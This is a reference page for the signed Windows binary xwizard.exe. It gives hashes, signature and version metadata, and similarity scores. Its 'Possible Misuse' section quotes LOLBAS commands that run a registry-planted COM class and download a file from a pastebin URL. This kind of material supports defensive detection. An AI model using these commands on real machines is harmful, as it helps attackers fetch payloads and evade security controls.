xwizard.exe

  • File Path: C:\Windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 C0CCC55F9E988ACB8B624EFD0EC8B92B
SHA1 ADEBEE7795F504746F5A565B94A4407783C02EA8
SHA256 AEA9116467138FDE0FDE0FD50C61EF1258B551AE1B64B2DF6BBCCE11467DF41C
SHA384 E227C1168E3D090E871C260BB14028FB675DFC258E8F7F7934B3F2874B6F9DBDA8A60D2C91A81EB7903895FEC8BFB27A
SHA512 9480415021EF8841B9E1EC587399F5564C7F1AED73C93B5BB8DAA4B12270C5E1FC07D62D4B482E172549C5AC371518C5B7570871C3E0C40E1865242A2C6B338D
SSDEEP 1536:khXUw9qLxeqI2GXaUzudDogp8URDoq4OZZZLlCIib:kBUlxeCeu6cdRD68wb

Signature

  • Status: Signature verified.
  • Serial: 33000000BCE120FDD27CC8EE930000000000BC
  • Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 10.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 49
C:\Windows\system32\ComputerDefaults.exe 44
C:\windows\system32\ComputerDefaults.exe 54
C:\Windows\system32\ComputerDefaults.exe 46
C:\Windows\system32\xwizard.exe 47
C:\windows\system32\xwizard.exe 58
C:\Windows\system32\xwizard.exe 47
C:\WINDOWS\system32\xwizard.exe 47
C:\windows\SysWOW64\ComputerDefaults.exe 55
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 49
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\ComputerDefaults.exe 49
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 57
C:\windows\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 50
C:\WINDOWS\SysWOW64\xwizard.exe 54

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.